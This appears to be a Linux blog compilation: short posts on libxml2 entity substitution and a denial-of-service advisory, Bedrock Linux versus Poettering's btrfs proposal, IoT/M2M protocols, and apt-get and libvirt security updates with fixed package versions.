Denial of Service Flaw in libxml2

Debian Linux Security Advisory 3057-1 – Sogeti found a denial of service flaw in libxml2, a library providing support to read, modify and write XML and HTML files. A remote attacker could provide a specially crafted XML file that, when processed by an application using libxml2, would lead to excessive CPU consumption (denial of service) based on excessive entity substitutions, even if entity substitution was disabled.

Entity Substitution

Entities in principle are similar to simple C macros. An entity defines an abbreviation for a given string that you can reuse many times throughout the content of your document. Entities are especially useful when a given string may occur frequently within a document, or to confine the change needed to a document to a restricted area in the internal subset of the document (at the beginning). Example:

1 <?xml version="1.0"?>
2 <!DOCTYPE EXAMPLE SYSTEM "example.dtd" [
3 <!ENTITY xml "Extensible Markup Language">
4 ]>
5 <EXAMPLE>
6    &xml;
7 </EXAMPLE>

Line 3 declares the xml entity. Line 6 uses the xml entity, by prefixing its name with ‘&’ and following it by ‘;’ without any spaces added. There are 5 predefined entities in libxml2 allowing you to escape characters with predefined meaning in some parts of the xml document content: &lt; for the character ‘<‘, &gt; for the character ‘>’, &apos; for the character ”’, &quot; for the character ‘”‘, and &amp; for the character ‘&’.

One of the problems related to entities is that you may want the parser to substitute an entity’s content so that you can see the replacement text in your application. Or you may prefer to keep entity references as such in the content to be able to save the document back without losing this usually precious information (if the user went through the pain of explicitly defining entities, he may have a a rather negative attitude if you blindly substitute them as saving time). The xmlSubstituteEntitiesDefault() function allows you to check and change the behaviour, which is to not substitute entities by default.

Here is the DOM tree built by libxml2 for the previous document in the default case:

/gnome/src/gnome-xml -> ./xmllint --debug test/ent1
DOCUMENT
version=1.0
   ELEMENT EXAMPLE
     TEXT
     content=
     ENTITY_REF
       INTERNAL_GENERAL_ENTITY xml
       content=Extensible Markup Language
     TEXT
     content=

And here is the result when substituting entities:

/gnome/src/gnome-xml -> ./tester --debug --noent test/ent1
DOCUMENT
version=1.0
   ELEMENT EXAMPLE
     TEXT
     content=     Extensible Markup Language

Bedrock Linux & Poettering’s New Suggestion!

Bedrock Linux is a Linux distribution created with the aim of making most of the (often seemingly mutually-exclusive) benefits of various other Linux distributions available simultaneously and transparently.

If one would like a rock-solid stable base (for example, from Debian or a RHEL clone) yet still have easy access to cutting-edge packages (from, say, Arch Linux), automate compiling packages with Gentoo’s portage, and ensure that software aimed only for the ever popular Ubuntu will run smoothly – all at the same time, in the same distribution – Bedrock Linux will provide a means to achieve this. ~ http://bedrocklinux.org/

Lennart Poettering has caused a big stir in the Linux world with his systemd approach to configuration. Now he has suggested a new way of building distros and getting your code into the users hands and its all based on btrfs file system.

using the filesystem versioning feature of btrfs to distribute everything from individual packages to entire operating systems(good for server&embed systems), i.e two files with the same name can exist in the same directory, just under different versions of the filesystem . It would then be possible to mix-and-match, even at run-time. If I understand it right, you could even install two operating systems and natively run executables that rely on either of them without rebooting.

It sounds a lot like Bedrock Linux …!!

But fundamental differences that you can notice are:

  • Bedrock Linux lets you use software straight from an upstream distro. If there’s some distro that provides something, you can use it now, while this proposal requires people make special packages for it. If people have to make special packages, I’m not sure I see the benefit of this over something like Nix… Bedrock Linux was largely created specifically because things like Nix don’t have enough packages.
  • Bedrock Linux intends to be very flexible in terms of what it imposes on the end-user. This seems to have a hard requirement on a btrfs feature. If btrfs isn’t performant in a specific area you like, isn’t stable enough yet, etc, this isn’t a viable solution for you. Moreover it is a bit worrying to tie things that tightly to a specific technology as it may make things hardware to replace down the road. What if someone comes up with some fancy new filesystem that is better in other ways but doesn’t have this feature?
  • Bedrock Linux groups things together by shared libraries so that if there’s a security issue, you only need to update a handful of files managed by presumably trusted upstream distros. With this, security updates fall back to the individual package maintainer; it feels like a rather large step backwards in terms of security from how Linux traditionally works.
  • Bedrock Linux “fixes” the problem of letting users use software that wasn’t aimed at their specific distro onlyfor users of Bedrock Linux. What Bedrock Linux is doing doesn’t really help people on other distros. This proposal could “fix” it in general if developers target it.
  • Bedrock Linux’s ability to run software from other distros means the software it runs wasn’t actually intended to run in this configuration and and an update could, in theory, break it. There is a lot of effort and hopefully smart design to avoid this, but it is still at least in theory possible. The software aimed at this proposal will know its situation and be less likely to run into this problem.

While on the surface this seems a lot like Bedrock Linux this proposal seems functionally closer to Nix. This has a similar restriction on requiring special packages for it and similar “fixes” the problem from the point of view of the packager.

IoT/M2M protocols

IoT/M2M development can be complex due to  large number of communication protocols used in today’s industries.  There are too many protocols to master for building an end-to-end IoT/M2M solution. MQTT, CoAP and OMA LWM2M (Lightweight M2M) protocols are well adopted in recent development inn M2M fields. These protocols cover the data transportation, application and device management layers requirements.

MQ Telemetry Transport (MQTT) is a lightweight broker-based publish/subscribe messaging protocol designed for  low bandwidth or is unreliable network to connect with embedded device with limited processor or memory resources.

CoAP is the Constrained Application Protocol from the CoRE (Constrained Resource Environments) IETF group.  Similar to HTTP, CoAP is a document transfer protocol (caop://).

OMA LightweightM2M (LWM2M) is an industry standard for device management of M2M/IoT devices. It heavily relies on CoAP and therefore is optimized for communications over sensor or cellular networks. OMA LWM2M provides an extensible object model that allows to enable application data exchanges in addition to the core device management features (firmware upgrade, connectivity monitoring)

Upgrade your apt-get!

Guillem Jover discovered that the changelog retrieval functionality in
apt-get used temporary files in an insecure way, allowing a local user
to cause arbitrary files to be overwritten.

This vulnerability is neutralized by the fs.protected_symlinks setting in
the Linux kernel, which is enabled by default in Debian 7 Wheezy and up.

For the stable distribution (wheezy), this problem has been fixed in
version 0.9.7.9+deb7u6.

For the unstable distribution (sid), this problem has been fixed in
version 1.0.9.2.

Its  recommended that you upgrade your apt packages.

libvirt Vulnerabilities

libvirt is an open source API, daemon and management tool for managing platform virtualization. It can be used to manage KVM, Xen, VMware ESX, QEMU and other virtualization technologies. These APIs are widely used in the orchestration layer of hypervisors in the development of a cloud-based solution.

Some of the major libvirt features are:

VM management: Various domain lifecycle operations such as start, stop, pause, save, restore, and migrate.
Remote machine support: All libvirt functionality is accessible on any machine running the libvirt daemon, including remote machines.
Storage management: Any host running the libvirt daemon can be used to manage various types of storage: create file images of various formats (qcow2, vmdk, raw, …), mount NFS shares, enumerate existing LVM volume groups, create new LVM volume groups and logical volumes, partition raw disk devices, …etc
Network interface management: Any host running the libvirt daemon can be used to manage physical and logical network interfaces.
Virtual NAT and Route based networking: Any host running the libvirt daemon can manage and create virtual networks.

Daniel P. Berrange and Richard Jones discovered that libvirt incorrectly
handled XML documents containing XML external entity declarations. An
attacker could use this issue to cause libvirtd to crash, resulting in a
denial of service on all affected releases, or possibly read arbitrary
files if fine grained access control was enabled on Ubuntu 14.04 LTS.

Luyao Huang discovered that libvirt incorrectly handled certain blkiotune
queries. An attacker could use this issue to cause libvirtd to crash,
resulting in a denial of service. This issue only applied to Ubuntu 12.04
LTS and Ubuntu 14.04 LTS.

You are using libvirt if you manage virtual machines using virsh, virt-manager, or virt-install (pretty much any virtualization tool that starts with virt-*). If you are using hypervisor specific tools like ‘xm’, ‘qemu-kvm’, etc. directly, you probably are not using libvirt. If you have virtual machines on your existing machine and you are using libvirt, ‘virsh list –all’ (usually run as root) should show something.

The problem can be corrected by updating your system to the following package version:

Ubuntu 14.04 LTS:
libvirt0 1.2.2-0ubuntu13.1.5
libvirt-bin 1.2.2-0ubuntu13.1.5
Ubuntu 12.04 LTS:
libvirt0 0.9.8-2ubuntu17.20
libvirt-bin 0.9.8-2ubuntu17.20
Ubuntu 10.04 LTS:
libvirt0 0.7.5-5ubuntu27.25
libvirt-bin 0.7.5-5ubuntu27.25